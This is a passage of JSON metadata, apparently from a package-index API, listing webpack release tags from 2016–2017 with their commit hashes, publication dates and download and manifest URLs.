ed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.1/manifests"},{"name":"v3.7.0","sha":"551ea76838f163a1e0fbf65182e2ac08d346a1f3","kind":"tag","published_at":"2017-10-11T18:07:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.0/manifests"},{"name":"v3.6.0","sha":"622675993d72c6ea7d70cd2e503fd9416f940b2b","kind":"tag","published_at":"2017-09-15T08:45:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.6.0/manifests"},{"name":"v3.5.6","sha":"92d5c209437f9ef9293571e24cc8dcf10459d578","kind":"tag","published_at":"2017-09-06T15:41:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.6","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.6/manifests"},{"name":"v3.5.5","sha":"ef6ab6820a74db730cfec6fd419d2c211d62c0bd","kind":"tag","published_at":"2017-08-16T14:55:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.5","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.5/manifests"},{"name":"v3.5.4","sha":"990563f9a2b3fb3e817b7e1b9d6841bcd1eaa51e","kind":"tag","published_at":"2017-08-12T09:16:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.4","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.4/manifests"},{"name":"v3.5.3","sha":"4b2b1ad99b86458983714c589c6495772b1292ee","kind":"tag","published_at":"2017-08-10T13:38:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.3","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.3/manifests"},{"name":"v3.5.2","sha":"25302e51a601b4e30a661d788471e4a50b7a9764","kind":"tag","published_at":"2017-08-09T10:51:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.2","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.2/manifests"},{"name":"v3.5.1","sha":"5be959311a746b976a0a56625cc4372307b351ed","kind":"tag","published_at":"2017-08-08T11:26:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.1/manifests"},{"name":"v3.5.0","sha":"75a8ffec0a8ab2f1f07a950ee965a31917af5fe9","kind":"tag","published_at":"2017-08-08T08:50:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.0/manifests"},{"name":"v3.4.1","sha":"1f064bc84f222305afada087f9631fd7ae39ea30","kind":"tag","published_at":"2017-07-26T08:48:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.4.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.1/manifests"},{"name":"v3.4.0","sha":"c8732c8d157ed56542d521a557dda7ff7ad12ffb","kind":"tag","published_at":"2017-07-25T14:27:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.0/manifests"},{"name":"v3.3.0","sha":"5b119e7c5b437fd48e7e681996b9be10cbd6de34","kind":"tag","published_at":"2017-07-15T13:52:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.3.0/manifests"},{"name":"v2.7.0","sha":"eeea490e8ec0e2341cd4bb6da82aabf6ca139322","kind":"tag","published_at":"2017-07-12T07:00:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.7.0/manifests"},{"name":"v3.2.0","sha":"d0059901266e54a22309c419cad6d9327767c5a3","kind":"tag","published_at":"2017-07-11T20:09:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.2.0/manifests"},{"name":"v3.1.0","sha":"4bb3018da4310deaeff52b8a1c2b5645282b9994","kind":"tag","published_at":"2017-07-06T21:57:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.1.0/manifests"},{"name":"v3.0.0","sha":"bf4ec9c26e8f6de76c3d3ec1371f3ca1c8999ca5","kind":"tag","published_at":"2017-06-19T15:37:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0/manifests"},{"name":"v3.0.0-rc.2","sha":"2ba04991056475509a4e45599a1f42e91cce6233","kind":"tag","published_at":"2017-06-14T21:46:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0-rc.2","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0-rc.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.2/manifests"},{"name":"v3.0.0-rc.1","sha":"2e8b77ddcf66867b208dffce97fb94a87be48369","kind":"tag","published_at":"2017-06-07T11:33:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0-rc.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0-rc.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.1/manifests"},{"name":"v3.0.0-rc.0","sha":"3d653290fafe385277b48e5a36807124618b9561","kind":"tag","published_at":"2017-06-05T14:12:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0-rc.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0-rc.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0-rc.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.0/manifests"},{"name":"v2.6.1","sha":"7cfd2c490ea96c9676e8de54f2e7b6d1214722da","kind":"tag","published_at":"2017-05-25T11:16:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.6.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"af05c147f24d3e7ee62e0c4102bb32c55e73b8d7","kind":"tag","published_at":"2017-05-22T20:38:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.0/manifests"},{"name":"v2.5.1","sha":"ad2f68f1f21602750ad891ea89a926806acbc95f","kind":"tag","published_at":"2017-05-06T20:07:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"bf3652b16b65c27db5243aa0d674e2de4a8ccde9","kind":"tag","published_at":"2017-05-04T10:17:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.0/manifests"},{"name":"v2.4.1","sha":"bd753567da1248624beaaea14af31d6dbe303411","kind":"tag","published_at":"2017-04-14T13:34:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.4.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.1/manifests"},{"name":"v2.4.0","sha":"0cbd8fd1a05ee401b5feb95ba2b8edae31571d94","kind":"tag","published_at":"2017-04-14T11:42:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.0/manifests"},{"name":"v1.15.0","sha":"d4878a55be7a4b7ac4e5db1ae5eef89e15811072","kind":"tag","published_at":"2017-04-13T10:18:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.15.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.15.0/manifests"},{"name":"v2.3.3","sha":"ba24c1b163dc038ed738eb4a57dcb241bf63146d","kind":"tag","published_at":"2017-04-03T07:49:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.3","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.3/manifests"},{"name":"v2.3.2","sha":"6b209b13d76ec43080d6afbad4bb4dd6931e4638","kind":"tag","published_at":"2017-03-25T00:02:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.2","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.2/manifests"},{"name":"v2.3.1","sha":"4b9b660e8c4fe8ab6425014cb24dcec2d5df194b","kind":"tag","published_at":"2017-03-22T14:40:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.1/manifests"},{"name":"v2.3.0","sha":"46dc08e6317170a56df6c34adc8133dd6f70f1fa","kind":"tag","published_at":"2017-03-21T22:43:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.0/manifests"},{"name":"v2.2.1","sha":"0445b156d2c958536b72036e68ca6bde0ad32055","kind":"tag","published_at":"2017-01-30T21:13:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.1/manifests"},{"name":"v2.2.0","sha":"4be093d27942c25ec802a40268ed94e24d886b1d","kind":"tag","published_at":"2017-01-17T19:14:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0/manifests"},{"name":"v2.2.0-rc.8","sha":"227846990cbc1a406bb61c5e6cafb3f3f38c8cdd","kind":"tag","published_at":"2017-01-17T18:46:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.8","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.8/manifests"},{"name":"v2.2.0-rc.7","sha":"0b476022bbbddb206432e20b9c8bc5e91e592202","kind":"tag","published_at":"2017-01-16T15:01:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.7","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.7/manifests"},{"name":"v2.2.0-rc.6","sha":"97966969b0c9e8425ecb1238deea979c6a18cb27","kind":"tag","published_at":"2017-01-16T02:48:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.6","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.6/manifests"},{"name":"v2.2.0-rc.5","sha":"437dce4c8684f4295b5bb68a6ea5662c2660d780","kind":"tag","published_at":"2017-01-15T16:23:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.5","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.5/manifests"},{"name":"v2.2.0-rc.4","sha":"f745f02910cb45a55ed659ebd99288e45a38e873","kind":"tag","published_at":"2017-01-11T15:42:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.4","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.4/manifests"},{"name":"v2.2.0-rc.3","sha":"92a8be23614f92bc5669bf43eb0ddf746b2477e7","kind":"tag","published_at":"2016-12-28T15:03:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.3","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.3/manifests"},{"name":"v2.2.0-rc.2","sha":"8369cc4c03767d7a76d1f7a047d11e71a550ddae","kind":"tag","published_at":"2016-12-22T10:51:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.2","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.2/manifests"},{"name":"v2.2.0-rc.1","sha":"27e604e23100274a8887a5acf0008376d2617071","kind":"tag","published_at":"2016-12-17T08:09:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.1/manifests"},{"name":"v2.2.0-rc.0","sha":"057814be1930cc4e8cee22c271823ea821ad067f","kind":"tag","published_at":"2016-12-14T21:32:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.0/manifests"},{"name":"v2.1.0-beta.28","sha":"2e2eac70ab1ba648ef663b9b93fdedd7928672c4","kind":"tag","published_at":"2016-12-13T07:58:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.28","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.28","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.28","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.28","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.28/manifests"},{"name":"v1.14.0","sha":"e666686d9029753c243db5880de44aba57151d76","kind":"tag","published_at":"2016-12-07T08:06:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.14.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.14.0/manifests"},{"name":"v2.1.0-beta.27","sha":"adaca2578cc3dcffbb2d0b639cb611a53f6da7c9","kind":"tag","published_at":"2016-11-15T19:00:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.27","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.27","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.27","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.27","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.27/manifests"},{"name":"v2.1.0-beta.26","sha":"afbdff48ef2d5b304a41e72f4df8d51d629bc96f","kind":"tag","published_at":"2016-11-14T00:07:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.26","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.26","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.26","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.26","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.26/manifests"},{"name":"v1.13.3","sha":"1a5fd7e8caeef794f67e56d9d734998209b0838c","kind":"commit","published_at":"2016-10-26T14:21:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.3","dependencies_parsed_at":null,"dependency_